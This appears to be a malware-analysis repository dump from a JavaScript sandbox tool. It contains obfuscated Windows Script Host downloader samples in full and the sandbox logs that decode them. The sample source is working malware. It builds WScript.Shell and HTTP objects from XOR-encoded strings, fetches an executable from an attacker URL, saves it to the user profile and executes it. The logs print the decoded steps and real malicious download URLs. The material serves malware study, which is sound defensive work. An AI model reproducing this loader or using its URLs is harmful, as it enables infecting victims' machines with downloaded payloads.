QUOELSUF = JXSEL(HWSELX("86XB6UA7QBCJA5EA1YBCSBBMB2FFBZ93TBCMB9FB0Y86SACLA6GA1AB0TB8O9AJB7CBFYB0SB6MA1H", XHZGH)); 130 | util_log("DYDUHJGS: 
" + DYDUHJGS + "[" + HWSELX("B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D", XHZGH) + "](" + HWSELX("F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V", XHZGH) + ")"); 131 | KGRDTRYP = DYDUHJGS[HWSELX("B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D", XHZGH)](HWSELX("F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V", XHZGH)); 132 | KGRDTRYP = KGRDTRYP + "\\"; 133 | 134 | WIOYAM = KGRDTRYP + QUOELSUF[HWSELX("92GB0AA1W81PB0KB8TA5M9BEB4XB8PB0I", XHZGH)]() + HWSELX("FBQB0MADFB0A", XHZGH); 135 | 136 | SAIGXSK = JXSEL(HWSELX("82LBCHBBA9DTA1LA1DA5WFBO82IBCBBBV9DQA1KA1EA5Z87UB0PA4JA0EB0YA6SA1MFBFE0YFBRE4J", XHZGH)); 137 | SAIGXSK[HWSELX("BATA5PB0JBBH", XHZGH)](HWSELX("B2RB0KA1Q", XHZGH), HWSELX("BDPA1IA1AA5TEFNFAGFAZBCUBBOA6IA1DB4WB9RA6LB0GB1BA6WFBPB7HBCAB1UFAMB4EB1ZB8TBCOBBIFBCA5XBDRA5MEAFB3CE8KE1CE5VE6O", XHZGH), false); 138 | SAIGXSK[HWSELX("86BB0VA1P87KB0EA4YA0RB0MA6FA1W9DPB0IB4CB1UB0OA7I", XHZGH)](HWSELX("80WA6QB0LA7FF8Z94VB2OB0HBBAA1T", XHZGH), HWSELX("98YBATAFOBCHB9CB9WB4QFAKE0EFBYE5TF5MFDE82WBCRBBKB1EBABA2TA6MF5D9BU81MF5CE3UFBLE4DEEXF5R81KA7DBCWB1PB0HBBBA1VFANE2FFBXE5REENF5AA7UA3OEFIE4BE4WFBQE5JFCCF5VB9OBCHBEZB0TF5N92IB0CB6ZBEVBAP", XHZGH)); 139 | 140 | SAIGXSK[HWSELX("A6YB0RBBMB1G", XHZGH)](); 141 | VKNBASTFP = JXSEL(HWSELX("94Z91U9AO91I97CFBW86SA1KA7DB0WB4PB8H", XHZGH)); 142 | VKNBASTFP[HWSELX("9ARA5LB0GBBB", XHZGH)]; 143 | 144 | VKNBASTFP[HWSELX("81PACJA5BB0U", XHZGH)] = 1; 145 | VKNBASTFP[HWSELX("82VA7QBCKA1EB0Z", XHZGH)](SAIGXSK[HWSELX("87NB0HA6BA5SBALBBEA6WB0Q97KBAEB1YACS", XHZGH)]); 146 | VKNBASTFP[HWSELX("86LB4FA3ZB0R81KBAD93WBCOB9GB0Z", XHZGH)](WIOYAM); 147 | VKNBASTFP[HWSELX("96NB9IBABA6WB0Q", XHZGH)]; 148 | DYDUHJGS[HWSELX("90RADMB0EB6W", XHZGH)](WIOYAM); 149 | }; 150 | }; 151 | 152 | function JXSEL(JONYSACSK) { 153 | NPKAWIDM = 'e'; 154 | AULUOHBJ = 'j'; 155 | IXYHDI = 'b'; 156 | ZWEYVZ = 'e'; 157 | HEGRM = 't'; 158 | ZJGCOABYZ = 't'; 159 | BHRDWRBTP = 'r'; 160 | DRIBTMEC = 'O'; 161 | PXPLUC = 'C'; 162 | EBUCVD = 'c'; 
163 | JLOWQT = 'e'; 164 | ADGUD = 'a'; 165 | 166 | YFHLSEYL = PXPLUC + BHRDWRBTP + JLOWQT + ADGUD + HEGRM + NPKAWIDM + DRIBTMEC + IXYHDI + AULUOHBJ + ZWEYVZ + EBUCVD + ZJGCOABYZ; 167 | util_log("JXSEL: WScript[" + YFHLSEYL +"](" + JONYSACSK +")"); 168 | YFHLSEYL = WScript[YFHLSEYL](JONYSACSK); 169 | 170 | return YFHLSEYL; 171 | 172 | }; 173 | -------------------------------------------------------------------------------- /malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js.orig: -------------------------------------------------------------------------------- 1 | NLWNAGICE(); 2 | 3 | function HTNHCX(GESRUAS) { 4 | 5 | FLFCXUV = parseInt(GESRUAS); 6 | return FLFCXUV; 7 | }; 8 | 9 | function SODXEPKEN(ZCBAHVYOL, GWQCZKRS) { 10 | 11 | DQDIXG = ZCBAHVYOL ^ GWQCZKRS; 12 | 13 | return DQDIXG; 14 | }; 15 | 16 | function HWSELX(RJSGZJN, XHZGH) { 17 | ICKSVUEAO = '0'; 18 | XPMFUE = 'x'; 19 | LMQYPS = ICKSVUEAO + XPMFUE; 20 | ZDJKDKZK = ''; 21 | 22 | FNWVPY = 61 - 58; 23 | QFGCST = 't'; 24 | ENYZLWYO = 'n'; 25 | LBVAC = 'i'; 26 | YOZENUDBO = 'g'; 27 | LNSCLQTC = 'o'; 28 | RUGKXKZUZ = 't'; 29 | GVGEPZOG = 'r'; 30 | KUGNOK = 'S'; 31 | IYCPSYFWX = QFGCST + LNSCLQTC + KUGNOK + RUGKXKZUZ + GVGEPZOG + LBVAC + ENYZLWYO + YOZENUDBO; 32 | 33 | KEDQH = RJSGZJN[IYCPSYFWX](); 34 | 35 | QSVXSXTEF = 'o'; 36 | JZJNXPBYH = 'h'; 37 | CFGINE = 'd'; 38 | DHWNQMC = 'a'; 39 | BXRVZYNTP = 'r'; 40 | AISMTUX = 'C'; 41 | RQAMQZ = 'm'; 42 | AUCPVRV = 'e'; 43 | UJXJUAZ = 'o'; 44 | XVNPQOG = 'f'; 45 | UTRTET = 'r'; 46 | HJWBAPJLC = 'C'; 47 | 48 | NSOSZH = XVNPQOG + UTRTET + QSVXSXTEF + RQAMQZ + AISMTUX + JZJNXPBYH + DHWNQMC + BXRVZYNTP + HJWBAPJLC + UJXJUAZ + CFGINE + AUCPVRV; 49 | MXECAU = 't'; 50 | CKZIO = 's'; 51 | NVFZAOFB = 'b'; 52 | CWFTSPJ = 's'; 53 | KNZKIGW = 'r'; 54 | HQOEB = 'u'; 55 | CNFTMW = CKZIO + HQOEB + NVFZAOFB + CWFTSPJ + MXECAU + KNZKIGW; 56 | 57 | DLJUV = 'g'; 58 | VBCOI = 'n'; 59 | HKNUST = 'h'; 60 | AKNXJ = 't'; 61 | YETVW = 'l'; 62 | ENBPLEBRX = 
'e'; 63 | 64 | FCLEFW = KEDQH[YETVW + ENBPLEBRX + VBCOI + DLJUV + AKNXJ + HKNUST]; 65 | 66 | for (var VEHIT = 0; VEHIT < FCLEFW; VEHIT += FNWVPY) { 67 | 68 | GMOLGWSA = LMQYPS; 69 | GMOLGWSA = GMOLGWSA + KEDQH[CNFTMW](VEHIT, 2); 70 | DHARERH = HTNHCX(GMOLGWSA); 71 | NPNSIMEK = SODXEPKEN(DHARERH, XHZGH); 72 | ZDJKDKZK = ZDJKDKZK + String[NSOSZH](NPNSIMEK); 73 | }; 74 | 75 | return ZDJKDKZK; 76 | }; 77 | 78 | function NLWNAGICE() { 79 | GXZMINO = false; 80 | SBRSRGIOQ = 113 - 110; 81 | KHZAZI = 'J'; 82 | OLNRBHZ = 'X'; 83 | SIZXIWJH = 'G'; 84 | WURGFNQ = 'E'; 85 | APFXKBUM = 'L'; 86 | 87 | AEOCOF = OLNRBHZ + APFXKBUM + WURGFNQ + KHZAZI + SIZXIWJH; 88 | 89 | try { 90 | 91 | GXZMINO = JXSEL(AEOCOF); 92 | } catch (Y) { 93 | 94 | WJZLSZQUO = 'm'; 95 | DMRDRQDZ = 'n'; 96 | YUDKNE = 'a'; 97 | CHFLAYM = 'e'; 98 | 99 | QGSBA = 'e'; 100 | WBYWXK = 'r'; 101 | VLMWRPHQ = 't'; 102 | NPDOS = 'A'; 103 | NVMHXEJCN = 'd'; 104 | MERNQAK = 'C'; 105 | XNBSPEJUP = 'o'; 106 | QPZBKFTR = 'c'; 107 | VAWUM = 'h'; 108 | QDRXPLSZU = 'a'; 109 | 110 | XHZGH = Y[DMRDRQDZ + YUDKNE + WJZLSZQUO + CHFLAYM][QPZBKFTR + VAWUM + QDRXPLSZU + WBYWXK + MERNQAK + XNBSPEJUP + NVMHXEJCN + QGSBA + NPDOS + VLMWRPHQ](SBRSRGIOQ); 111 | }; 112 | if (!GXZMINO) { 113 | 114 | XHZGH = XHZGH + 110; 115 | LDSATLTI = HWSELX("82Z86UB6HA7ABCSA5LA1FFBY86UBDNB0HB9BB9X", XHZGH); 116 | DYDUHJGS = JXSEL(LDSATLTI); 117 | 118 | QUOELSUF = JXSEL(HWSELX("86XB6UA7QBCJA5EA1YBCSBBMB2FFBZ93TBCMB9FB0Y86SACLA6GA1AB0TB8O9AJB7CBFYB0SB6MA1H", XHZGH)); 119 | KGRDTRYP = DYDUHJGS[HWSELX("B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D", XHZGH)](HWSELX("F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V", XHZGH)); 120 | KGRDTRYP = KGRDTRYP + "\\"; 121 | 122 | WIOYAM = KGRDTRYP + QUOELSUF[HWSELX("92GB0AA1W81PB0KB8TA5M9BEB4XB8PB0I", XHZGH)]() + HWSELX("FBQB0MADFB0A", XHZGH); 123 | 124 | SAIGXSK = JXSEL(HWSELX("82LBCHBBA9DTA1LA1DA5WFBO82IBCBBBV9DQA1KA1EA5Z87UB0PA4JA0EB0YA6SA1MFBFE0YFBRE4J", XHZGH)); 125 | 
SAIGXSK[HWSELX("BATA5PB0JBBH", XHZGH)](HWSELX("B2RB0KA1Q", XHZGH), HWSELX("BDPA1IA1AA5TEFNFAGFAZBCUBBOA6IA1DB4WB9RA6LB0GB1BA6WFBPB7HBCAB1UFAMB4EB1ZB8TBCOBBIFBCA5XBDRA5MEAFB3CE8KE1CE5VE6O", XHZGH), false); 126 | SAIGXSK[HWSELX("86BB0VA1P87KB0EA4YA0RB0MA6FA1W9DPB0IB4CB1UB0OA7I", XHZGH)](HWSELX("80WA6QB0LA7FF8Z94VB2OB0HBBAA1T", XHZGH), HWSELX("98YBATAFOBCHB9CB9WB4QFAKE0EFBYE5TF5MFDE82WBCRBBKB1EBABA2TA6MF5D9BU81MF5CE3UFBLE4DEEXF5R81KA7DBCWB1PB0HBBBA1VFANE2FFBXE5REENF5AA7UA3OEFIE4BE4WFBQE5JFCCF5VB9OBCHBEZB0TF5N92IB0CB6ZBEVBAP", XHZGH)); 127 | 128 | SAIGXSK[HWSELX("A6YB0RBBMB1G", XHZGH)](); 129 | VKNBASTFP = JXSEL(HWSELX("94Z91U9AO91I97CFBW86SA1KA7DB0WB4PB8H", XHZGH)); 130 | VKNBASTFP[HWSELX("9ARA5LB0GBBB", XHZGH)]; 131 | 132 | VKNBASTFP[HWSELX("81PACJA5BB0U", XHZGH)] = 1; 133 | VKNBASTFP[HWSELX("82VA7QBCKA1EB0Z", XHZGH)](SAIGXSK[HWSELX("87NB0HA6BA5SBALBBEA6WB0Q97KBAEB1YACS", XHZGH)]); 134 | VKNBASTFP[HWSELX("86LB4FA3ZB0R81KBAD93WBCOB9GB0Z", XHZGH)](WIOYAM); 135 | VKNBASTFP[HWSELX("96NB9IBABA6WB0Q", XHZGH)]; 136 | DYDUHJGS[HWSELX("90RADMB0EB6W", XHZGH)](WIOYAM); 137 | }; 138 | }; 139 | 140 | function JXSEL(JONYSACSK) { 141 | NPKAWIDM = 'e'; 142 | AULUOHBJ = 'j'; 143 | IXYHDI = 'b'; 144 | ZWEYVZ = 'e'; 145 | HEGRM = 't'; 146 | ZJGCOABYZ = 't'; 147 | BHRDWRBTP = 'r'; 148 | DRIBTMEC = 'O'; 149 | PXPLUC = 'C'; 150 | EBUCVD = 'c'; 151 | JLOWQT = 'e'; 152 | ADGUD = 'a'; 153 | 154 | YFHLSEYL = PXPLUC + BHRDWRBTP + JLOWQT + ADGUD + HEGRM + NPKAWIDM + DRIBTMEC + IXYHDI + AULUOHBJ + ZWEYVZ + EBUCVD + ZJGCOABYZ; 155 | 156 | YFHLSEYL = WScript[YFHLSEYL](JONYSACSK); 157 | 158 | return YFHLSEYL; 159 | 160 | }; -------------------------------------------------------------------------------- /malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.out: -------------------------------------------------------------------------------- 1 | 2 Oct 23:31:47 - mailware-jail, a malware sandbox ver. 
0.7 2 | 2 Oct 23:31:47 - ------------------------ 3 | 2 Oct 23:31:47 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 2 Oct 23:31:47 - Malware files: malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js 5 | 2 Oct 23:31:47 - Output file for sandbox dump: sandbox_dump_after.json 6 | 2 Oct 23:31:47 - Output directory for generated files: output/ 7 | 2 Oct 23:31:47 - ==> Preparing Sandbox environment. 8 | 2 Oct 23:31:47 - => Executing: env/utils.js 9 | 2 Oct 23:31:47 - => Executing: env/eval.js 10 | 2 Oct 23:31:47 - Preparing sandbox to intercept eval() calls. 11 | 2 Oct 23:31:47 - => Executing: env/function.js 12 | 2 Oct 23:31:47 - Preparing sandbox to intercept 'new Function()' calls. 13 | 2 Oct 23:31:47 - => Executing: env/wscript.js 14 | 2 Oct 23:31:47 - Preparing sandbox to emulate WScript environment. 15 | 2 Oct 23:31:47 - => Executing: env/browser.js 16 | 2 Oct 23:31:47 - Preparing sandbox to emulate Browser environment (default = IE11). 
17 | 2 Oct 23:31:47 - Created: window[1] 18 | 2 Oct 23:31:47 - Created: document[2] 19 | 2 Oct 23:31:47 - document[2].createElement(html) 20 | 2 Oct 23:31:47 - Element[3] created, named: 'html' 21 | 2 Oct 23:31:47 - document[2].createElement(body) 22 | 2 Oct 23:31:47 - Element[5] created, named: 'body' 23 | 2 Oct 23:31:47 - document[2].body = 'Element[5]' 24 | 2 Oct 23:31:47 - document[2].createElement(head) 25 | 2 Oct 23:31:47 - Element[7] created, named: 'head' 26 | 2 Oct 23:31:47 - Element[3].appendChild(Element[7]) 27 | 2 Oct 23:31:47 - Element[3].firstChild set 28 | 2 Oct 23:31:47 - document[2].body.get() => Element[5] 29 | 2 Oct 23:31:47 - Element[3].appendChild(Element[5]) 30 | 2 Oct 23:31:47 - => Executing: env/agents.js 31 | 2 Oct 23:31:47 - Setting Browser environment to: IE8 on Win10 64bit 32 | 2 Oct 23:31:47 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 2 Oct 23:31:47 - => Executing: env/other.js 34 | 2 Oct 23:31:47 - => Executing: env/console.js 35 | 2 Oct 23:31:47 - ==> Executing malware file(s). 36 | 2 Oct 23:31:47 - => Executing: malware/20161002/ac5705ba4eeb9295b162073cdccf64b9a0a14fd3bf933694e083aab2e65820e9.js 37 | 2 Oct 23:31:47 - JXSEL: WScript[CreateObject](XLEJG) 38 | 2 Oct 23:31:47 - WScript.CreateObject(XLEJG) 39 | 2 Oct 23:31:47 - !!! 
FIXME: WScript.CreateObject: type 'xlejg' not handled 40 | 2 Oct 23:31:47 - a: TypeError: WScript.CreateObject: Could not locate automation class named xlejg b: name c: charCodeAt d: 3 41 | 2 Oct 23:31:47 - XHZGH 101 42 | 2 Oct 23:31:47 - HWSELX(82Z86UB6HA7ABCSA5LA1FFBY86UBDNB0HB9BB9X, 213) => WScript.Shell 43 | 2 Oct 23:31:47 - LDSATLTI: WScript.Shell XHZGH: 213 charcode: 103 44 | 2 Oct 23:31:47 - LDSATLTI WScript.Shell 45 | 2 Oct 23:31:47 - JXSEL: WScript[CreateObject](WScript.Shell) 46 | 2 Oct 23:31:47 - WScript.CreateObject(WScript.Shell) 47 | 2 Oct 23:31:47 - Created: WScript.Shell[9] 48 | 2 Oct 23:31:47 - HWSELX(86XB6UA7QBCJA5EA1YBCSBBMB2FFBZ93TBCMB9FB0Y86SACLA6GA1AB0TB8O9AJB7CBFYB0SB6MA1H, 213) => Scripting.FileSystemObject 49 | 2 Oct 23:31:47 - JXSEL: WScript[CreateObject](Scripting.FileSystemObject) 50 | 2 Oct 23:31:47 - WScript.CreateObject(Scripting.FileSystemObject) 51 | 2 Oct 23:31:47 - Scripting.FileSystemObject[10] created. 52 | 2 Oct 23:31:47 - HWSELX(B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D, 213) => expandEnvironmentStrings 53 | 2 Oct 23:31:47 - HWSELX(F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V, 213) => %UserProfile% 54 | 2 Oct 23:31:47 - DYDUHJGS: [object Object][expandEnvironmentStrings](%UserProfile%) 55 | 2 Oct 23:31:47 - HWSELX(B0SADLA5FB4YBBQB1J90EBBXA3SBCNA7GBAABBVB8PB0KBBEA1A86TA1MA7GBCZBBSB2LA6D, 213) => expandEnvironmentStrings 56 | 2 Oct 23:31:47 - HWSELX(F0U80OA6JB0DA7Y85SA7MBAEB3YBCRB9KB0DF0V, 213) => %UserProfile% 57 | 2 Oct 23:31:47 - WScript.Shell[9].ExpandEnvironmentStrings(%UserProfile%) 58 | 2 Oct 23:31:47 - HWSELX(92GB0AA1W81PB0KB8TA5M9BEB4XB8PB0I, 213) => GetTempName 59 | 2 Oct 23:31:47 - Scripting.FileSystemObject[10].GetTempName() => TempFile[11] 60 | 2 Oct 23:31:47 - HWSELX(FBQB0MADFB0A, 213) => .exe 61 | 2 Oct 23:31:47 - HWSELX(82LBCHBBA9DTA1LA1DA5WFBO82IBCBBBV9DQA1KA1EA5Z87UB0PA4JA0EB0YA6SA1MFBFE0YFBRE4J, 213) => WinHttp.WinHttpRequest.5.1 62 | 2 Oct 23:31:47 - JXSEL: 
WScript[CreateObject](WinHttp.WinHttpRequest.5.1) 63 | 2 Oct 23:31:47 - WScript.CreateObject(WinHttp.WinHttpRequest.5.1) 64 | 2 Oct 23:31:47 - Created: MSXML2.XMLHTTP[12] 65 | 2 Oct 23:31:47 - HWSELX(BATA5PB0JBBH, 213) => open 66 | 2 Oct 23:31:47 - HWSELX(B2RB0KA1Q, 213) => get 67 | 2 Oct 23:31:47 - HWSELX(BDPA1IA1AA5TEFNFAGFAZBCUBBOA6IA1DB4WB9RA6LB0GB1BA6WFBPB7HBCAB1UFAMB4EB1ZB8TBCOBBIFBCA5XBDRA5MEAFB3CE8KE1CE5VE6O, 213) => http://instalseds.bid/admin.php?f=403 68 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].open(get,http://instalseds.bid/admin.php?f=403,false) 69 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].async = 'false' 70 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].async.get() => false 71 | 2 Oct 23:31:47 - HWSELX(86BB0VA1P87KB0EA4YA0RB0MA6FA1W9DPB0IB4CB1UB0OA7I, 213) => SetRequestHeader 72 | 2 Oct 23:31:47 - HWSELX(80WA6QB0LA7FF8Z94VB2OB0HBBAA1T, 213) => User-Agent 73 | 2 Oct 23:31:47 - HWSELX(98YBATAFOBCHB9CB9WB4QFAKE0EFBYE5TF5MFDE82WBCRBBKB1EBABA2TA6MF5D9BU81MF5CE3UFBLE4DEEXF5R81KA7DBCWB1PB0HBBBA1VFANE2FFBXE5REENF5AA7UA3OEFIE4BE4WFBQE5JFCCF5VB9OBCHBEZB0TF5N92IB0CB6ZBEVBAP, 213) => Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko 74 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].setRequestHeader(User-Agent, Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko) 75 | 2 Oct 23:31:47 - HWSELX(A6YB0RBBMB1G, 213) => send 76 | 2 Oct 23:31:47 - MSXML2.XMLHTTP[12].send(undefined) 77 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].onreadystatechange(), readyState = 4 length: 0 status: 200 78 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12] statusText = null 79 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].responseBody = '' 80 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].status = '200' 81 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].onreadystatechange() undefined 82 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].send(undefined) finished 83 | 2 Oct 23:31:48 - HWSELX(94Z91U9AO91I97CFBW86SA1KA7DB0WB4PB8H, 213) => ADODB.Stream 84 | 2 Oct 23:31:48 - JXSEL: WScript[CreateObject](ADODB.Stream) 85 | 2 Oct 23:31:48 - 
WScript.CreateObject(ADODB.Stream) 86 | 2 Oct 23:31:48 - Created: ADODB_Stream[13] 87 | 2 Oct 23:31:48 - HWSELX(9ARA5LB0GBBB, 213) => Open 88 | 2 Oct 23:31:48 - HWSELX(81PACJA5BB0U, 213) => Type 89 | 2 Oct 23:31:48 - ADODB_Stream[13].Type = '1' 90 | 2 Oct 23:31:48 - HWSELX(82VA7QBCKA1EB0Z, 213) => Write 91 | 2 Oct 23:31:48 - HWSELX(87NB0HA6BA5SBALBBEA6WB0Q97KBAEB1YACS, 213) => ResponseBody 92 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].ResponseBody.get() => 93 | 2 Oct 23:31:48 - ADODB_Stream[13].content = '' 94 | 2 Oct 23:31:48 - ADODB_Stream[13].Write(str) - 0 bytes 95 | 2 Oct 23:31:48 - ADODB_Stream[13].size = '0' 96 | 2 Oct 23:31:48 - HWSELX(86LB4FA3ZB0R81KBAD93WBCOB9GB0Z, 213) => SaveToFile 97 | 2 Oct 23:31:48 - ADODB_Stream[13].SaveToFile(%UserProfile%\TempFile[11].exe, undefined) 98 | 2 Oct 23:31:48 - ADODB_Stream[13].content.get() => 99 | 2 Oct 23:31:48 - HWSELX(96NB9IBABA6WB0Q, 213) => Close 100 | 2 Oct 23:31:48 - HWSELX(90RADMB0EB6W, 213) => Exec 101 | 2 Oct 23:31:48 - WScript.Shell[9].Exec(%UserProfile%\TempFile[11].exe) 102 | 2 Oct 23:31:48 - ==> Cleaning up sandbox. 103 | 2 Oct 23:31:48 - ==> Script execution finished, dumping sandbox environment to a file. 104 | 2 Oct 23:31:48 - MSXML2.XMLHTTP[12].ResponseBody.get() => 105 | 2 Oct 23:31:48 - Saving: output/_UserProfile__TempFile[11].exe 106 | 2 Oct 23:31:48 - Generated file saved 107 | 2 Oct 23:31:48 - The sandbox context has been saved to: sandbox_dump_after.json 108 | -------------------------------------------------------------------------------- /malware/20161007/3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.out: -------------------------------------------------------------------------------- 1 | 7 Oct 21:57:26 - mailware-jail, a malware sandbox ver. 
0.8 2 | 7 Oct 21:57:26 - ------------------------ 3 | 7 Oct 21:57:26 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 7 Oct 21:57:26 - Malware files: malware/20161007/3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.js 5 | 7 Oct 21:57:26 - Output file for sandbox dump: sandbox_dump_after.json 6 | 7 Oct 21:57:26 - Output directory for generated files: output/ 7 | 7 Oct 21:57:26 - ==> Preparing Sandbox environment. 8 | 7 Oct 21:57:26 - => Executing: env/utils.js 9 | 7 Oct 21:57:26 - => Executing: env/eval.js 10 | 7 Oct 21:57:26 - Preparing sandbox to intercept eval() calls. 11 | 7 Oct 21:57:26 - => Executing: env/function.js 12 | 7 Oct 21:57:26 - Preparing sandbox to intercept 'new Function()' calls. 13 | 7 Oct 21:57:26 - => Executing: env/wscript.js 14 | 7 Oct 21:57:26 - Preparing sandbox to emulate WScript environment. 15 | 7 Oct 21:57:26 - => Executing: env/browser.js 16 | 7 Oct 21:57:26 - Preparing sandbox to emulate Browser environment (default = IE11). 
17 | 7 Oct 21:57:26 - Created: window[1] 18 | 7 Oct 21:57:26 - Created: document[2] 19 | 7 Oct 21:57:26 - document[2].createElement(html) 20 | 7 Oct 21:57:26 - Element[3] created, named: 'html' 21 | 7 Oct 21:57:26 - document[2].createElement(body) 22 | 7 Oct 21:57:26 - Element[5] created, named: 'body' 23 | 7 Oct 21:57:26 - document[2].body = 'Element[5]' 24 | 7 Oct 21:57:26 - document[2].createElement(head) 25 | 7 Oct 21:57:26 - Element[7] created, named: 'head' 26 | 7 Oct 21:57:26 - Element[3].appendChild(Element[7]) 27 | 7 Oct 21:57:26 - Element[3].firstChild set 28 | 7 Oct 21:57:26 - document[2].body.get() => Element[5] 29 | 7 Oct 21:57:26 - Element[3].appendChild(Element[5]) 30 | 7 Oct 21:57:26 - => Executing: env/agents.js 31 | 7 Oct 21:57:26 - Setting Browser environment to: IE8 on Win10 64bit 32 | 7 Oct 21:57:26 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 7 Oct 21:57:26 - => Executing: env/other.js 34 | 7 Oct 21:57:26 - => Executing: env/console.js 35 | 7 Oct 21:57:26 - ==> Executing malware file(s). 36 | 7 Oct 21:57:26 - => Executing: malware/20161007/3c1ab04d15fdc84afbf819df546359c8df9a8c303c67c90ce28a4417d9039393.js 37 | 7 Oct 21:57:26 - Calling 'new Function(`var orqasnakri = WScript.CreateObject('WScript.Shell'); var fcoppohwura9 = orqasnakri.CreateShortcut('\qvertyd.lnk'); return fcoppohwura9.TargetPath;`)' 38 | 7 Oct 21:57:26 - args: util_log(`Calling function() {var orqasnakri = WScript.CreateObject('WScript.Shell'); var fcoppohwura9 = orqasnakri.Cr ... 
(truncated)(`+Array.prototype.slice.call(arguments).join(", ")+`)`);var ret = function() {var orqasnakri = WScript.CreateObject('WScript.Shell'); var fcoppohwura9 = orqasnakri.CreateShortcut('\qvertyd.lnk'); return fcoppohwura9.TargetPath;}(); util_log("Returning: '"+ret+"'"); return ret; 39 | 7 Oct 21:57:26 - Calling function() {var orqasnakri = WScript.CreateObject('WScript.Shell'); var fcoppohwura9 = orqasnakri.Cr ... (truncated)() 40 | 7 Oct 21:57:26 - WScript.CreateObject(WScript.Shell) 41 | 7 Oct 21:57:26 - Created: WScript.Shell[9] 42 | 7 Oct 21:57:26 - WScript.CreateShortcut(qvertyd.lnk) 43 | 7 Oct 21:57:26 - Created: WshShortcut[10](qvertyd.lnk) 44 | 7 Oct 21:57:26 - WshShortcut[10](qvertyd.lnk).TargetPath.get() => (string) '' 45 | 7 Oct 21:57:26 - Returning: '' 46 | 7 Oct 21:57:26 - WScript.CreateObject(Scripting.FileSystemObject) 47 | 7 Oct 21:57:26 - Scripting.FileSystemObject[11] created. 48 | 7 Oct 21:57:26 - WScript.CreateObject(WScript.Shell) 49 | 7 Oct 21:57:26 - Created: WScript.Shell[12] 50 | 7 Oct 21:57:26 - WScript.CreateObject(MSXML2.XMLHTTP) 51 | 7 Oct 21:57:26 - Created: MSXML2.XMLHTTP[13] 52 | 7 Oct 21:57:26 - WScript.CreateObject(ADODB.Stream) 53 | 7 Oct 21:57:26 - Created: ADODB_Stream[14] 54 | 7 Oct 21:57:26 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/ 55 | 7 Oct 21:57:26 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15] 56 | 7 Oct 21:57:26 - MSXML2.XMLHTTP[13].open(GET,http://kutchvalley.com/creative/wp-admin/css/colors/midnight/gNcCTV.exe,0) 57 | 7 Oct 21:57:26 - MSXML2.XMLHTTP[13].async = (boolean) 'false' 58 | 7 Oct 21:57:26 - MSXML2.XMLHTTP[13].async.get() => (boolean) 'false' 59 | 7 Oct 21:57:26 - MSXML2.XMLHTTP[13].send(undefined) 60 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 0 status: 301 61 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13] statusText = null 62 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].responseBody = (object) '' 63 | 7 Oct 21:57:27 - 
MSXML2.XMLHTTP[13].status = (number) '301' 64 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].onreadystatechange() undefined 65 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].send(undefined) finished 66 | 7 Oct 21:57:27 - ADODB_Stream[14].type = (string) '1' 67 | 7 Oct 21:57:27 - MSXML2.XMLHTTP[13].ResponseBody.get() => (object) '' 68 | 7 Oct 21:57:27 - ADODB_Stream[14].Open() 69 | 7 Oct 21:57:27 - ADODB_Stream[14].content = (object) '' 70 | 7 Oct 21:57:27 - ADODB_Stream[14].Write(str) - 0 bytes 71 | 7 Oct 21:57:27 - ADODB_Stream[14].size = (number) '0' 72 | 7 Oct 21:57:27 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined) 73 | 7 Oct 21:57:27 - ADODB_Stream[14].content.get() => (object) '' 74 | 7 Oct 21:57:27 - ADODB_Stream[14].Close() 75 | 7 Oct 21:57:27 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined) 76 | 7 Oct 21:57:27 - ==> Cleaning up sandbox. 77 | 7 Oct 21:57:27 - ==> Script execution finished, dumping sandbox environment to a file. 